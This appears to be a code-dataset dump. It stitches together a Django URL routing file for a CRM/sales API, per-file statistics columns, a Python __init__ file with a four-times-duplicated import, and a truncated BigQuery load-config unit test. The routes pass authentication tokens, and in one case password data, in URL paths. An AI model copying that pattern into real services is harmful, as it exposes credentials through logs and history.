re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/get_group_customers$', token_required(customersapi.get_group_customers), name=u"apigetgroupcustomers"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getcustomerslist$', token_required(customersapi.getCustomersList), name=u"apigetcustomerslist"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/insertCustomer/(?P<data>.*)$', token_required(customersapi.insertCustomer), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/modifyCustomer/(?P<data>.*)$', token_required(customersapi.modifyCustomer), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/deleteCustomer/(?P<data>.*)$', token_required(customersapi.deleteCustomer), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getlinkedcustomers/(?P<account>.*)$', token_required(customersapi.getlinkedcustomers), name=u"apigetlinkedcustomers"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getparentcustomers/(?P<account>.*)$', token_required(customersapi.getparentcustomers), name=u"apigetparentcustomers"),
# re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getparentcustomers/(?P<account>.*)$', token_required(customersapi.GetParentCustomers.as_view()), name=u"apigetparentcustomers"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getSalesPerCustomer/(?P<account>.*)$', token_required(customersapi.get_sales_per_customer), name=u"getSalesPerCustomerapi"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/addLinkedCustomer/(?P<account>.*)$', token_required(customersapi.add_linked_customer), name=u"addLinkedCustomer"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/removeLinkedCustomer/(?P<account>.*)$', token_required(customersapi.remove_linked_customer), name=u"removeLinkedCustomer"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getCustomerByProducts/(?P<account>.*)$', token_required(customersapi.customer_by_products), name=u"customerByProducts"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getCustomerByProductTypes/(?P<account>.*)$', token_required(customersapi.customer_by_product_types), name=u"getCustomerByProductTypes"),
# # Contacts
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getdata$', token_required(contactsapi.getContactsData), name=u"apidata"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getcontactslist$', token_required(contactsapi.getContactsList), name=u"apigetcustomerslist"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getcontactslist/(?P<account>.*)$', token_required(contactsapi.getContactsList), name=u"apigetcustomerslist"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getcontacts$', token_required(contactsapi.getContacts), name=u"apigetcustomers"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getcontactsByCustomer$', token_required(contactsapi.getContactsByCustomer), name=u"apigetcustomers"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getcontactsByCustomer/(?P<account>.*)$', token_required(contactsapi.getContactsByCustomer), name=u"apigetcustomers"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getcontacts/(?P<account>.*)$', token_required(contactsapi.getContacts), name=u"apigetcustomers"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/insertContact/(?P<data>.*)$', token_required(contactsapi.insertContact), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/modifyContact/(?P<data>.*)$', token_required(contactsapi.modifyContact), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/deleteContact/(?P<data>.*)$', token_required(contactsapi.deleteContact), name=u"saveCustData"),
# # Sales
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/insertSalesRecord/(?P<data>.*)$', token_required(salesapi.insertSalesRecord), name=u"saveCustData"),
# KAMs
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/createKam/(?P<data>.*)$', token_required(actionsapi.createKam), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/modifyKam/(?P<data>.*)$', token_required(actionsapi.modifyKam), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/mergeKams/(?P<data>.*)$', token_required(actionsapi.mergeKams), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/deleteKam/(?P<kamid>.*)$', token_required(actionsapi.deleteKam), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getKam$', token_required(actionsapi.getKam), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getKam/(?P<data>.*)$', token_required(actionsapi.getKam), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/linkKamToAction/(?P<lk>.*)$', token_required(actionsapi.linkKamToAction), name=u"apigetplans"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/unlinkKamFromAction/(?P<lk>.*)$', token_required(actionsapi.unlinkKamFromAction), name=u"apigetplans"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/linkKamToPlan/(?P<lk>.*)$', token_required(actionsapi.linkKamToPlan), name=u"apigetplans"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/unlinkKamFromPlan/(?P<lk>.*)$', token_required(actionsapi.unlinkKamFromPlan), name=u"apigetplans"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/linkKamToCustomer/(?P<lk>.*)$', token_required(actionsapi.linkKamToCustomer), name=u"apigetplans"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/unlinkKamFromCustomer/(?P<lk>.*)$', token_required(actionsapi.unlinkKamFromCustomer), name=u"apigetplans"),
# Xing
# re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getXingJobs$', token_required(xingapi.getXingJobs), name=u"saveCustData"),
# re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getXingUserProfile$', token_required(xingapi.getXingUserProfile), name=u"saveCustData"),
# Goals
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/createGoal/(?P<data>.*)$', token_required(goalsapi.createGoal), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/modifyGoal/(?P<data>.*)$', token_required(goalsapi.modifyGoal), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getGoals/(?P<data>.*)$', token_required(goalsapi.getGoals), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getGoals$', token_required(goalsapi.getGoals), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getGoalsByYear/(?P<data>.*)$', token_required(goalsapi.getGoalsByYear), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getGoalsByYear$', token_required(goalsapi.getGoalsByYear), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getGoalsPerQuarter/(?P<data>.*)$', token_required(goalsapi.getGoalsPerQuarter), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getGoalsPerQuarter$', token_required(goalsapi.getGoalsPerQuarter), name=u"saveCustData"),
# Performance
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getTotalPerformance$', token_required(goalsapi.getTotalPerformance), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getPerformance$', token_required(goalsapi.getPerformance), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getPerformanceKpi$', token_required(goalsapi.getPerformanceKpi), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getPerformanceCRM$', token_required(goalsapi.getPerformanceCRM), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/get_performance_crm$', token_required(goalsapi.get_performance_crm), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/get_performance_products$', token_required(goalsapi.get_performance_products), name=u"PerformanceProduct"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/performance_search/(?P<data>.*)$', token_required(goalsapi.performance_search), name=u"search"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/get_sales_year/$', token_required(goalsapi.get_sales_year), name=u"getSalesYear"),
# reports
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/insertReport/(?P<data>.*)$', token_required(goalsapi.insertReport), name=u"insertreport"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getReport/(?P<data>.*)$', token_required(goalsapi.getReport), name=u"getreport"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/modifyReport/(?P<data>.*)$', token_required(goalsapi.modifyReport), name=u"modifyreport"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/deleteReport/(?P<data>.*)$', token_required(goalsapi.dropReport), name=u"dropreport"),
# Data analysis
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/analyzeData$', token_required(dataanalysisapi.analyzeData), name=u"saveCustData"),
# Insights
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getallinsights$', token_required(insightsapi.getAllInsights), name=u"getinsights"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getallinsights/(?P<account>.*)$', token_required(insightsapi.getAllInsights), name=u"getinsights"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getinsights$', token_required(insightsapi.getInsights), name=u"getinsights"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getinsights/(?P<account>.*)$', token_required(insightsapi.getInsights), name=u"getinsights"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/get_insights$', token_required(insightsapi.get_insights), name=u"apidata"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/get_insights/(?P<account>.*)$', token_required(insightsapi.get_insights), name=u"apidata"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getCustomerRisk$', token_required(insightsapi.getCustomerRisk), name=u"apidata"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getCustomerRisk/(?P<account>[-\w ]+)$', token_required(insightsapi.getCustomerRisk), name=u"apidata"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getProductRisk$', token_required(insightsapi.getProductRisk), name=u"apidata"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getProductRisk/(?P<account>[-\w ]+)$', token_required(insightsapi.getProductRisk), name=u"apidata"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getProductTypeRisk$', token_required(insightsapi.getProductTypeRisk), name=u"apidata"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getProductTypeRisk/(?P<account>[-\w ]+)$', token_required(insightsapi.getProductTypeRisk), name=u"apidata"),
# Actions
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/setaction/(?P<task>.*)$', token_required(actionsapi.setTask), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/createAction/(?P<task>.*)$', token_required(actionsapi.createAction), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/deleteAction/(?P<task>.*)$', token_required(actionsapi.dropTask), name=u"apidroptask"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/modifyAction/(?P<action>.*)$', token_required(actionsapi.modifyAction), name=u"apicreateplan"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getactions$', token_required(actionsapi.getTasks), name=u"apigetactions"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getactions/(?P<account>.*)$', token_required(actionsapi.getTasks), name=u"apigetactions"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getActions$', token_required(actionsapi.getActions), name=u"apigetactions"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getActions/(?P<account>.*)$', token_required(actionsapi.getActions), name=u"apigetactions"),
# Plans
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/setplan/(?P<plan>.*)$', token_required(actionsapi.setPlan), name=u"apicreateplan"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/modifyPlan/(?P<plan>.*)$', token_required(actionsapi.modifyPlan), name=u"apicreateplan"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/deletePlan/(?P<planid>\d+)$', token_required(actionsapi.dropPlan), name=u"apidropplan"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getplans$', token_required(actionsapi.getPlans), name=u"apigetplans"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getplans/(?P<account>.*)$', token_required(actionsapi.getPlans), name=u"apigetplans"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/get_plans$', token_required(actionsapi.get_plans), name=u"apigetplans"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/get_plans/(?P<account>.*)$', token_required(actionsapi.get_plans), name=u"apigetplans"),
# Plans and Actions
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/plansToActions$', token_required(actionsapi.plansToActions), name=u"apigetplansperaciton"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getPlansPerAction$', token_required(actionsapi.getPlansGroupedByAction), name=u"apigetplansperaciton"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getPlansPerAction/(?P<account>.*)$', token_required(actionsapi.getPlansGroupedByAction), name=u"apigetplans"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getActionsPerPlan$', token_required(actionsapi.getActionsGroupedByPlan), name=u"apigetplans"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getActionsPerPlan/(?P<account>.*)$', token_required(actionsapi.getActionsGroupedByPlan), name=u"apigetplans"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/linkPlanToAction/(?P<lk>.*)$', token_required(actionsapi.linkPlanToAction), name=u"apigetplans"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/unlinkPlanFromAction/(?P<lk>.*)$', token_required(actionsapi.unlinkPlanFromAction), name=u"apigetplans"),
# Users
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getuserprofile$', token_required(usersapi.getUserProfile), name=u"getuserprofile"),
re_path(r'^(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getuserprofile$', token_required(usersapi.getUserProfile), name=u"getuserprofile"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/setContactInfo/(?P<info>.*)$', token_required(usersapi.setUserContactInfo), name=u"setcontactinfo"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/setactivityinfo/(?P<lastUpload>\w+)/(?P<lastFileUploaded>\w+)$', token_required(usersapi.setUserContactInfo), name=u"setactivityinfo"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/setconfiginfo/(?P<language>\w+)$', token_required(usersapi.setUserConfigInfo), name=u"setconfiginfo"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/setavatarimages$', token_required(usersapi.setavatarImages), name=u"setavatarimages"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/change_password/(?P<password_info>.*)$', token_required(usersapi.change_password), name=u"change_password"),
# Groups
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getGroups$', token_required(groupsapi.getGroups), name=u"apigetplans"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getGroups/(?P<user_id>[-\w\ ]+)$', token_required(groupsapi.getGroups), name=u"apigetplans"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/createGroup/(?P<group>.*)$', token_required(groupsapi.createGroup), name=u"apicreateplan"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/modifyGroup/(?P<group>.*)$', token_required(groupsapi.modifyGroup), name=u"apicreateplan"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/deleteGroup/(?P<group_id>\d+)$', token_required(groupsapi.deleteGroup), name=u"apidropplan"),
# Groups and Users
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getUsersPerGroup$', token_required(groupsapi.getUsersPerGroup), name=u"apigetplansperaciton"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getUsersPerGroup/(?P<user_name>[-\w\ ]+)$', token_required(groupsapi.getUsersPerGroup), name=u"apigetplans"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getGroupsPerUser$', token_required(groupsapi.getGroupsPerUser), name=u"apigetplansperaciton"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getGroupsPerUser/(?P<user_name>[-\w\ ]+)$', token_required(groupsapi.getGroupsPerUser), name=u"apigetplans"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/addUserToGroup/(?P<lk>.*)$', token_required(groupsapi.addUserToGroup), name=u"apigetplans"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/removeUserFromGroup/(?P<lk>.*)$', token_required(groupsapi.removeUserFromGroup), name=u"apigetplans"),
# Maps
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/maps/getCustomersData$', token_required(mapsapi.getCustomers), name=u"setconfiginfo"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/maps/getAllocation/(?P<details>.*)', token_required(mapsapi.getAllocation), name=u"setconfiginfo"),
# Products
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/insertProduct/(?P<data>.*)$', token_required(productsapi.insertProduct), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/insertProductType/(?P<data>.*)$', token_required(productsapi.insertProductType), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/insertProductLine/(?P<data>.*)$', token_required(productsapi.insertProductLine), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/insertProductClass/(?P<data>.*)$', token_required(productsapi.insertProductClass), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/deleteProduct/(?P<product>.*)$', token_required(productsapi.deleteProduct), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/deleteProductType/(?P<product>.*)$', token_required(productsapi.deleteProductType), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getProducts$', token_required(productsapi.getProducts), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getProducts/(?P<product>.*)$', token_required(productsapi.getProducts), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getProductsBy$', token_required(productsapi.getProductsBy), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getProductsBy/(?P<groupby>.*)$', token_required(productsapi.getProductsBy), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getProductsByType/(?P<data>.*)$', token_required(productsapi.getProductsByType), name=u"product_by_type"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getProductsByCustomer/(?P<data>.*)$', token_required(productsapi.getProductsByCustomer), name=u"product_by_customer"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getMinMaxVal/(?P<data>.*)$', token_required(productsapi.getMinMaxVal), name=u"ge_tMin_Max_Val"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getProductsByCustomer/(?P<data>.*)$', token_required(productsapi.getProductsByCustomer), name=u"product_by_customer"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getMinMaxVal/(?P<data>.*)$', token_required(productsapi.getMinMaxVal), name=u"get_tMin_Max_Val"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getsuggestedRange/(?P<data>.*)$', token_required(productsapi.getSuggestedRange), name=u"get_suggested_range"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getProductInsights$', token_required(productsapi.getProductInsights), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getProductInsights/(?P<params>.*)$', token_required(productsapi.getProductInsights), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/get_product_insights$', token_required(productsapi.get_product_insights), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/get_product_insights/(?P<params>.*)$', token_required(productsapi.get_product_insights), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getProductTypeInsights$', token_required(productsapi.getProductTypeInsights), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getProductTypeInsights/(?P<params>.*)$', token_required(productsapi.getProductTypeInsights), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/topproducts$', token_required(productsapi.topProducts), name=u"setconfiginfo"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/topproducts/(?P<params>.*)$', token_required(productsapi.topProducts), name=u"setconfiginfo"),
# industry
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/get_industries$', token_required(industryapi.get_industry), name=u"getIndustry"),
# Pricing
# re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(\d+)/product-price-suggestion$', token_required(product_price_suggestion.suggest_price_for_product), name=u"suggest_price"),
]
| 107.992443
| 205
| 0.683437
| 5,734
| 42,873
| 4.982211
| 0.043076
| 0.020302
| 0.067383
| 0.073929
| 0.895302
| 0.862504
| 0.771143
| 0.721577
| 0.707645
| 0.690458
| 0
| 0.001483
| 0.056329
| 42,873
| 397
| 206
| 107.992443
| 0.704632
| 0.049752
| 0
| 0.007117
| 0
| 0.498221
| 0.50161
| 0.401559
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.003559
| 0.053381
| 0
| 0.053381
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
ae98d38374dc22d10e05086e15b3487b5807bbe3
| 299
|
py
|
Python
|
models/rec/__init__.py
|
BruceHan98/OCHTPS
|
5bee02bcbff36029cd47b4802178216f980a4298
|
[
"MIT"
] | null | null | null |
models/rec/__init__.py
|
BruceHan98/OCHTPS
|
5bee02bcbff36029cd47b4802178216f980a4298
|
[
"MIT"
] | null | null | null |
models/rec/__init__.py
|
BruceHan98/OCHTPS
|
5bee02bcbff36029cd47b4802178216f980a4298
|
[
"MIT"
] | null | null | null |
from .rec_layer_new_with_tcn_big import DenseNet as DenseNet_with_TCN_big
from .rec_layer_new_with_tcn_big import DenseNet as DenseNet_with_TCN_big
from .rec_layer_new_with_tcn_big import DenseNet as DenseNet_with_TCN_big
from .rec_layer_new_with_tcn_big import DenseNet as DenseNet_with_TCN_big
| 37.375
| 73
| 0.896321
| 56
| 299
| 4.214286
| 0.178571
| 0.237288
| 0.338983
| 0.254237
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0.090301
| 299
| 7
| 74
| 42.714286
| 0.867647
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 14
|
ae9c5f841f49b16d3a7a89761212264bf529f80c
| 5,839
|
py
|
Python
|
tests/component/db/bigquery/test_load_config_options_variants.py
|
cwegrzyn/records-mover
|
e3b71d6c09d99d0bcd6a956b9d09d20f8abe98d2
|
[
"Apache-2.0"
] | 36
|
2020-03-17T11:56:51.000Z
|
2022-01-19T16:03:32.000Z
|
tests/component/db/bigquery/test_load_config_options_variants.py
|
cwegrzyn/records-mover
|
e3b71d6c09d99d0bcd6a956b9d09d20f8abe98d2
|
[
"Apache-2.0"
] | 60
|
2020-03-02T23:13:29.000Z
|
2021-05-19T15:05:42.000Z
|
tests/component/db/bigquery/test_load_config_options_variants.py
|
cwegrzyn/records-mover
|
e3b71d6c09d99d0bcd6a956b9d09d20f8abe98d2
|
[
"Apache-2.0"
] | 4
|
2020-08-11T13:17:37.000Z
|
2021-11-05T21:11:52.000Z
|
import unittest
from records_mover.records.delimited import complain_on_unhandled_hints
from records_mover.db.bigquery.load_job_config_options import load_job_config
from records_mover.records.load_plan import RecordsLoadPlan
from records_mover.records.processing_instructions import ProcessingInstructions
from records_mover.records.records_format import DelimitedRecordsFormat
class TestLoadJobConfigVariants(unittest.TestCase):
def test_load_job_config_bigquery_variant(self):
records_format = DelimitedRecordsFormat(variant='bigquery')
processing_instructions = ProcessingInstructions(fail_if_dont_understand=True,
fail_if_cant_handle_hint=True,
fail_if_row_invalid=True)
load_plan = RecordsLoadPlan(processing_instructions=processing_instructions,
records_format=records_format)
unhandled_hints = set(records_format.hints.keys())
out = load_job_config(unhandled_hints, load_plan)
complain_on_unhandled_hints(processing_instructions.fail_if_dont_understand,
unhandled_hints, records_format.hints)
expectations = {
'allowJaggedRows': False,
